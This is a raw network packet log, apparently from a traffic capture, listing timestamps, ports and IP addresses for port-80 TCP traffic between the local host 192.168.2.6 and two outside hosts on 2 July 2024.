Jul 2, 2024 00:05:08.044296980 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044306040 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044316053 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044316053 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.044316053 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.044327021 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044337034 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044337988 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.044348955 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044370890 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.044370890 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.044410944 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.044922113 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044934034 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044974089 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.045064926 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.045075893 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.045085907 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.045095921 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.045105934 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.045115948 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.045121908 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.045125961 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.045136929 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.045140982 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.045146942 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.045156956 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.045165062 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.045169115 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.045169115 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.045176983 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.045186996 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.045198917 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.045198917 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.045205116 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.045216084 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.045224905 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.045232058 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.045234919 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.045244932 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.045252085 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.045257092 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.045267105 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.045277119 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.045278072 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.045289993 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.045298100 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.045300007 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.045311928 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.045317888 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.045324087 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.045342922 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.045372009 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.046051025 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046062946 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046072006 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046082020 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046092987 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046103001 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.046103954 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046116114 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046122074 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.046125889 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046137094 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046137094 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.046154022 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046164036 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046169043 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.046175003 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046185970 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046195984 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046197891 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.046197891 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.046206951 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046217918 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046227932 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046237946 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046245098 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.046245098 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.046248913 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046260118 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.046261072 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.046271086 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.046281099 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.046289921 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.046293974 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.046293974 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.046300888 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.046333075 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.046333075 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.046885014 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.046896935 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.046999931 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.047039986 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.047050953 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.047060966 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.047065973 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.047075033 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.047084093 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.047086000 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.047096968 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047107935 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047117949 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047127008 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047136068 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047136068 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.047136068 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.047138929 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.047148943 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047158003 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.047161102 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047172070 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.047172070 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047189951 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047194958 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.047200918 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047210932 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047219992 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.047223091 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047234058 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047243118 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047252893 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047262907 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047271967 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047281981 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.047319889 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.047319889 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.047319889 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.047319889 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.047344923 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.048015118 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.048027039 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.048037052 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.048047066 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.048055887 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048065901 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048075914 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048079967 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.048089027 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048099995 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048101902 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.048110008 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048120975 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048130989 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.048130989 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048146963 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048150063 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.048157930 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048167944 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.048168898 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048168898 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.048178911 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048190117 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048199892 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048211098 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048221111 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048226118 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048232079 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048234940 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.048234940 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.048242092 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048253059 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048264027 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048266888 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.048307896 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.048307896 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.048871040 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.048906088 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.049015045 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049026012 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049036026 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049046040 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049056053 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049066067 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049069881 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.049069881 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.049077034 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049087048 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049098969 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049108982 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049113035 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.049113035 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.049119949 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049129963 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049144983 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049149036 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.049156904 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049168110 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049177885 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049177885 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.049189091 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049201012 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049201965 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.049201965 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.049206972 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049216986 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049227953 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049232006 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.049237967 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049247980 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049248934 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.049257994 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049268007 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.049287081 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.049287081 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.049300909 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.050004005 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.050017118 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.050025940 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.050031900 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.050041914 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.050052881 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.050061941 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.050072908 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.050082922 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.050092936 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.050103903 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.050110102 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.050121069 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.050132990 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.050143003 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.050153017 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.050158024 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.050163984 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.050173998 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.050174952 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.050175905 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.050185919 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.050196886 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.050205946 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.050213099 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.050213099 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.050215960 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.050226927 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.050236940 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.050239086 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.050247908 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.050276041 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.050276041 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.050292969 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.050836086 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.050904036 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.051000118 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051011086 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051021099 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051032066 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051042080 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051053047 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051054001 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.051063061 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051073074 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051083088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051095963 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.051096916 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051109076 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.051115036 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051126957 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051136017 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051142931 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.051142931 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.051147938 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051156998 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051167011 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051177025 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051187038 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051198006 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051208019 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051218033 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051228046 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051240921 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051249981 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051253080 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.051253080 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.051253080 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.051253080 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.051259995 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051286936 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.051316023 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.051970005 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051980972 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.051991940 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052002907 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052012920 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052020073 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.052023888 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052038908 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052041054 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.052050114 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052059889 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052069902 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052073002 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.052082062 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052097082 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.052098036 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052109957 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052119970 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052122116 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.052122116 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.052129984 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052140951 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052150965 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052154064 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.052154064 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.052160978 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052170992 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052180052 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052190065 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052200079 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052203894 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.052210093 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052221060 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.052231073 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.052248955 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.052362919 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.052915096 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.053013086 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.053080082 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.053092003 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.053102970 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.053112984 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.053122997 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.053132057 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.053133011 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.053143978 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.053153992 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.053155899 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.053164959 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.053174973 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.053178072 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.053185940 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.053196907 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.053203106 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053212881 CEST	80	49714	77.105.133.27	192.168.2.6
